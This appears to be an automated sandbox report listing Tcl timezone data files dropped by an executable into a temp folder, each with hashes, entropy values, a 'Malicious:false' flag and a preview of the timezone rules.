                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Windhoek) {. {-9223372036854775808 4104 0 LMT}. {-2458170504 5400 0 SWAT}. {-2109288600 7200 0 SAST}. {-860976000 10800 1 SAST}. {-845254800 7200 0 SAST}. {637970400 7200 0 CAT}. {765324000 3600 0 WAT}. {778640400 7200 1 WAST}. {796780800 3600 0 WAT}. {810090000 7200 1 WAST}. {828835200 3600 0 WAT}. {841539600 7200 1 WAST}. {860284800 3600 0 WAT}. {873594000 7200 1 WAST}. {891734400 3600 0 WAT}. {905043600 7200 1 WAST}. {923184000 3600 0 WAT}. {936493200 7200 1 WAST}. {954633600 3600 0 WAT}. {967942800 7200 1 WAST}. {986083200 3600 0 WAT}. {999392400 7200 1 WAST}. {1018137600 3600 0 WAT}. {1030842000 7200 1 WAST}. {1049587200 3600 0 WAT}. {1062896400 7200 1 WAST}. {1081036800 3600 0 WAT}. {1094346000 7200 1 WAST}. {1112486400 3600 0 WAT}. {1125795600 7200 1 WAST}. {1143936000 3600 0 WAT}. {1157245200 7200 1 WAST}. {1175385600

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Adak

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8171
                                                                                                                                                                                                                                                    Entropy (8bit):3.783423774615603
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:sGWQm82ctfc/TVu7pAmKABmAlJD1NPaTsrEe50IC:sGWQm67pAmKABmiD1R2sG
                                                                                                                                                                                                                                                    MD5:5949AFB87AF85610E5C631DC54A38AD5
                                                                                                                                                                                                                                                    SHA1:D9CCBAF5C8E4F8E9C6B1F7822F3570D063AC6B1C
                                                                                                                                                                                                                                                    SHA-256:F6D49D601764487A9248691D6CA87E83031652110392CB6EA49FD58ACF97C8C7
                                                                                                                                                                                                                                                    SHA-512:82AEEF83F0A7B1B9EBEDBD6C09D8E15AA434E8D5F99D740044B9DFFD3EAE5C29BB9A3B9C342D03777C1369C13E2A22971169C86B6387D2B472EAEB6810CE43DE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Adak) {. {-9223372036854775808 44001 0 LMT}. {-3225356001 -42398 0 LMT}. {-2188944802 -39600 0 NST}. {-883573200 -39600 0 NST}. {-880196400 -36000 1 NWT}. {-769395600 -36000 1 NPT}. {-765374400 -39600 0 NST}. {-757342800 -39600 0 NST}. {-86878800 -39600 0 BST}. {-31496400 -39600 0 BST}. {-21466800 -36000 1 BDT}. {-5745600 -39600 0 BST}. {9982800 -36000 1 BDT}. {25704000 -39600 0 BST}. {41432400 -36000 1 BDT}. {57758400 -39600 0 BST}. {73486800 -36000 1 BDT}. {89208000 -39600 0 BST}. {104936400 -36000 1 BDT}. {120657600 -39600 0 BST}. {126709200 -36000 1 BDT}. {152107200 -39600 0 BST}. {162392400 -36000 1 BDT}. {183556800 -39600 0 BST}. {199285200 -36000 1 BDT}. {215611200 -39600 0 BST}. {230734800 -36000 1 BDT}. {247060800 -39600 0 BST}. {262789200 -36000 1 BDT}. {278510400 -39600 0 BST}. {294238800 -36000 1 BDT}. {309960000 -3

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Anchorage

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8444
                                                                                                                                                                                                                                                    Entropy (8bit):3.8881028022209834
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:WERpxXw34N+YXSUKC8aaIqDPRs/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8s:WEZd6M/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                    MD5:A1CD6589E2F4580D7334F1ED9E5FF7AB
                                                                                                                                                                                                                                                    SHA1:593F87F30B8B766389E30322194C25441EFED694
                                                                                                                                                                                                                                                    SHA-256:48792AAD13FB634F3BFE27B1C3752AE50950818DFF2D6B598E4AF449DC3B187B
                                                                                                                                                                                                                                                    SHA-512:63F6197E738C51EFB830CB8440F93EDC27EACA035BA8A75383FD095928E8DEC05C305EB559018E8D4F5778D76E6CC4D659DF8F408DAA33574F47B8C7F344F877
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Anchorage) {. {-9223372036854775808 50424 0 LMT}. {-3225362424 -35976 0 LMT}. {-2188951224 -36000 0 CAT}. {-883576800 -36000 0 CAWT}. {-880200000 -32400 1 CAWT}. {-769395600 -32400 0 CAPT}. {-765378000 -36000 0 CAPT}. {-757346400 -36000 0 CAT}. {-86882400 -36000 0 AHST}. {-31500000 -36000 0 AHST}. {-21470400 -32400 1 AHDT}. {-5749200 -36000 0 AHST}. {9979200 -32400 1 AHDT}. {25700400 -36000 0 AHST}. {41428800 -32400 1 AHDT}. {57754800 -36000 0 AHST}. {73483200 -32400 1 AHDT}. {89204400 -36000 0 AHST}. {104932800 -32400 1 AHDT}. {120654000 -36000 0 AHST}. {126705600 -32400 1 AHDT}. {152103600 -36000 0 AHST}. {162388800 -32400 1 AHDT}. {183553200 -36000 0 AHST}. {199281600 -32400 1 AHDT}. {215607600 -36000 0 AHST}. {230731200 -32400 1 AHDT}. {247057200 -36000 0 AHST}. {262785600 -32400 1 AHDT}. {278506800 -36000 0 AHST}. {294235200

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Anguilla

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                                                                                    Entropy (8bit):4.9101657646476164
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290/8J5290e/:MBaIMY9QpI290/8m90O
                                                                                                                                                                                                                                                    MD5:F7D915076ABE4FF032E13F8769D38433
                                                                                                                                                                                                                                                    SHA1:F930A8943E87105EE8523F640EA6F65BD4C9CE78
                                                                                                                                                                                                                                                    SHA-256:9D368458140F29D95CAB9B5D0259DE27B52B1F2E987B4FA1C12F287082F4FE56
                                                                                                                                                                                                                                                    SHA-512:63C99FFA65F749B7637D0DF5A73A21AC34DFEAD364479DE992E215258A82B9C15AB0D45AAF29BD2F259766346FDB901412413DD44C5D45BB8DF6B582C34F48B3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Anguilla) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Antigua

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):202
                                                                                                                                                                                                                                                    Entropy (8bit):4.90033942341457
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290//MFe90e/:MBaIMY9QpI290//V90O
                                                                                                                                                                                                                                                    MD5:25CA3996DDB8F1964D3008660338BA72
                                                                                                                                                                                                                                                    SHA1:B66D73B5B38C2CCCA78232ADC3572BBBEB79365D
                                                                                                                                                                                                                                                    SHA-256:A2ABBD9BCFCE1DB1D78C99F4993AC0D414A08DB4AC5CE915B81119E17C4DA76F
                                                                                                                                                                                                                                                    SHA-512:A25AFE4FD981F458FE194A5D87C35BE5FC7D4426C1EEE8311AE655BB53364CD4AAC0710C0D7E6A91C0F248E2A6916902F4FD43A220CFF7A6474B77D93CF35C81
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Antigua) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Araguaina

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1747
                                                                                                                                                                                                                                                    Entropy (8bit):3.9453090301458333
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5LP+Ih+j+R+u+W+iW+M+A+r+hN+gU+Wt+x3+XG+M+w+b+v+ux+/+C+jZ+7Y+2+AE:lP+2+j+R+u+W+L+M+A+r+L+v+Wt+h+2w
                                                                                                                                                                                                                                                    MD5:D87879474118B09FA3B97B6B18264CF5
                                                                                                                                                                                                                                                    SHA1:3C8624FDC65F96B6D991FD67165D52AC928416F6
                                                                                                                                                                                                                                                    SHA-256:932D9F324563F1C4B56B17A9BC9DFE6A98473AAC4F23CD23A8DD178E4334F594
                                                                                                                                                                                                                                                    SHA-512:E0F033BBEF514F18213686C1A097196E8E4DA778DFB947DF4A25774DA19EF6FD24EC32274B83D42D6A625F6DAE3B8CA8861C580524D388BB9C7643B799EE037A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Araguaina) {. {-9223372036854775808 -11568 0 LMT}. {-1767214032 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Buenos_Aires

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2010
                                                                                                                                                                                                                                                    Entropy (8bit):3.9779263835893843
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5WcafJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwr:vEJaGK9+LUlT/uXgeVL+PRjG3dUXHg67
                                                                                                                                                                                                                                                    MD5:2DDA63C37B5BDAB56F9250A98A53EACE
                                                                                                                                                                                                                                                    SHA1:6CA1A502AD4D943A9F5E7824E48546BBD19C571D
                                                                                                                                                                                                                                                    SHA-256:B808C84849A1D5D61F223B8A6155EDA91BA1E575C0B8CF4CDD0C499CF499C042
                                                                                                                                                                                                                                                    SHA-512:E1A2F9B81A5ACAF0C6B30363074CDA524A341446F2C2F5F7010BBDA0F57BD8C131C31D28E23A4E62C06E3749B251F178C30C556F24B715D4B6558F09A8CEC137
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Buenos_Aires) {. {-9223372036854775808 -14028 0 LMT}. {-2372097972 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Catamarca

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2039
                                                                                                                                                                                                                                                    Entropy (8bit):3.9634733329308918
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5f4fJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwR4:N+JaGK9+LUlT/uXgeVL+PRjG3dUXHQ33
                                                                                                                                                                                                                                                    MD5:9F9AC2706BED81376AA10BFCFAD684DD
                                                                                                                                                                                                                                                    SHA1:1FCB09ABDDFA9CFD2EA099B284A599E2CAAE3BF3
                                                                                                                                                                                                                                                    SHA-256:69D8A30B3FD4AD2C5DC4545B81EFE322570D90B78FA2DAC85897AEF53842CFA9
                                                                                                                                                                                                                                                    SHA-512:4713EC8CFB0123596F0F36DBAB3F23A1889872F2CA891FF6F9DE319C54AC47201C697ACD6B670DF2561A5635D605425BA812CA23F070E2ACE9E058FAA1804E0C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Catamarca) {. {-9223372036854775808 -15788 0 LMT}. {-2372096212 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\ComodRivadavia

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):237
                                                                                                                                                                                                                                                    Entropy (8bit):4.672788403288451
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7/MMXAIVAIgp/MMXs290/MquQ90/MMXAv:MBaIMY/Mhp/MP290/MquQ90/MH
                                                                                                                                                                                                                                                    MD5:42D568B6100D68F9E5698F301F4EC136
                                                                                                                                                                                                                                                    SHA1:E0A5F43A80EB0FAAFBD45127DCAF793406A4CF3A
                                                                                                                                                                                                                                                    SHA-256:D442E5BBB801C004A7903F6C217149FCDA521088705AC9FECB0BC3B3058981BF
                                                                                                                                                                                                                                                    SHA-512:99580239B40247AF75FFAA44E930CDECB71F6769E3597AC85F19A8816F7D0859F6A0D5499AFAC2FA35C32BA05B75B27C77F36DE290DD0D442C0769D6F41E96DA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Catamarca)]} {. LoadTimeZoneFile America/Argentina/Catamarca.}.set TZData(:America/Argentina/ComodRivadavia) $TZData(:America/Argentina/Catamarca).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Cordoba

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2006
                                                                                                                                                                                                                                                    Entropy (8bit):3.9677183425688307
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5zxpfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGws:1x9JaGK9+LUlT/uXgeVL+PRjG3dUXHQr
                                                                                                                                                                                                                                                    MD5:61BA43D4E743A7C289D0DD4753AF5266
                                                                                                                                                                                                                                                    SHA1:650558730C9E32A5F532CBA08147516304DE7023
                                                                                                                                                                                                                                                    SHA-256:AD6E551ED3466EB78770620B79A72A4F145A6D587E2E0956E87BE110952252E1
                                                                                                                                                                                                                                                    SHA-512:5CFC96CDF1D86CE95E14FABF5861FDCEEB0EC5A3B7A9A55D18163DF6B01FA1BDD0A876AB15C5828409ADC51B3A5A26AC4C1F875ECD32EB6CD8729B98E34DD72E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Cordoba) {. {-9223372036854775808 -15408 0 LMT}. {-2372096592 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Jujuy

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2005
                                                                                                                                                                                                                                                    Entropy (8bit):3.973466609224067
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5rCfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRr:FcJaGK9+LUlT/uXgeVL+PRjG3dUXfrBV
                                                                                                                                                                                                                                                    MD5:F54525F3F2427C9F752F3C5D3762CEA2
                                                                                                                                                                                                                                                    SHA1:9A0C4779B04622D521884F1DDA88744E10A9B72E
                                                                                                                                                                                                                                                    SHA-256:643BBFE9E8BDCF711AFD52BA189E675B3DD5B6A0E47E204F95EC5AC4BAD4B623
                                                                                                                                                                                                                                                    SHA-512:AB2F99DC324D64CC42CE487A48AAC5096185A8531E0756551A0239D49A3CF8A7972F6858167A3864CFBEF3F13A15F47F99D10B04E78BEB33E3CDB3735FE245A5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Jujuy) {. {-9223372036854775808 -15672 0 LMT}. {-2372096328 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}. {

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\La_Rioja

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2067
                                                                                                                                                                                                                                                    Entropy (8bit):3.961168755371772
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5J6fJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRU:HkJaGK9+LUlT/uXgeVL+PRjG3dUXHv63
                                                                                                                                                                                                                                                    MD5:C4276571AC47CAB0A2866D228DB5356C
                                                                                                                                                                                                                                                    SHA1:8088B248BD6801EF8A537A81F3BBD1AA72332889
                                                                                                                                                                                                                                                    SHA-256:D94723529462DC8DDC82AF71268AD0EA1E5ABDD1AE56CF95C2787E6D55DFC366
                                                                                                                                                                                                                                                    SHA-512:6B5198BD963CFC60B32328B427C937B562BFB7E9EE2B16077DA6AC7E8ED6AA8538A7B2353F501642B74378E29AEA2535CF89C2B71DCF25EE829EE8D097CD944F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/La_Rioja) {. {-9223372036854775808 -16044 0 LMT}. {-2372095956 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Mendoza

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2043
                                                                                                                                                                                                                                                    Entropy (8bit):3.9713587246734114
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5YefJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRn:C4JaGK9+LUlT/uXgeVL+PRjG3dUXp9Im
                                                                                                                                                                                                                                                    MD5:615EA020751D8AF717840FE95A5657A8
                                                                                                                                                                                                                                                    SHA1:1B95B53EEAA3C19335EEDCB645237EC9B779A0E2
                                                                                                                                                                                                                                                    SHA-256:9F4CD0AD99421209D3240F067F763C957B395D1ECC80881D51EFAE6DDEE0A375
                                                                                                                                                                                                                                                    SHA-512:E83A7CCFBF5EA830A63E6C655611165FE4B260F13F7FB2234D6A9BA859C93CE6E32C2F691A10DBE07966A0D162D7CCACE0E8B1F66159660358E835FDF7832146
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Argentina/Mendoza) {. {-9223372036854775808 -16516 0 LMT}. {-2372095484 -15408 0 CMT}. {-1567453392 -14400 0 ART}. {-1233432000 -10800 0 ARST}. {-1222981200 -14400 0 ART}. {-1205956800 -10800 1 ARST}. {-1194037200 -14400 0 ART}. {-1172865600 -10800 1 ARST}. {-1162501200 -14400 0 ART}. {-1141329600 -10800 1 ARST}. {-1130965200 -14400 0 ART}. {-1109793600 -10800 1 ARST}. {-1099429200 -14400 0 ART}. {-1078257600 -10800 1 ARST}. {-1067806800 -14400 0 ART}. {-1046635200 -10800 1 ARST}. {-1036270800 -14400 0 ART}. {-1015099200 -10800 1 ARST}. {-1004734800 -14400 0 ART}. {-983563200 -10800 1 ARST}. {-973198800 -14400 0 ART}. {-952027200 -10800 1 ARST}. {-941576400 -14400 0 ART}. {-931032000 -10800 1 ARST}. {-900882000 -14400 0 ART}. {-890337600 -10800 1 ARST}. {-833749200 -14400 0 ART}. {-827265600 -10800 1 ARST}. {-752274000 -14400 0 ART}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Argentina\Rio_Gallegos

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2041
                                                                                                                                                                                                                                                    Entropy (8bit):3.9709004305556337
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5mpfJSkKSk2Sk6SktSkuSk7SkESka6SkJ31/SkeSkHSkXASkOSkFSk7SkuSkGwRp:o9JaGK9+LUlT/uXgeVL+PRjG3dUXHg63
                                                                                                                                                                                                                                                    MD5:E9C3978CF8824F03582C0C4DBB086138
                                                                                                                                                                                                                                                    SHA1:854A28BA75715E35AC79A19875B510D87C102D36
                                                                                                                                                                                                                                                    SHA-256:DE502BAF9DDD8BD775C1B4AC5681CD36C639ABC2A3D59579A89F6D3786FC6E27
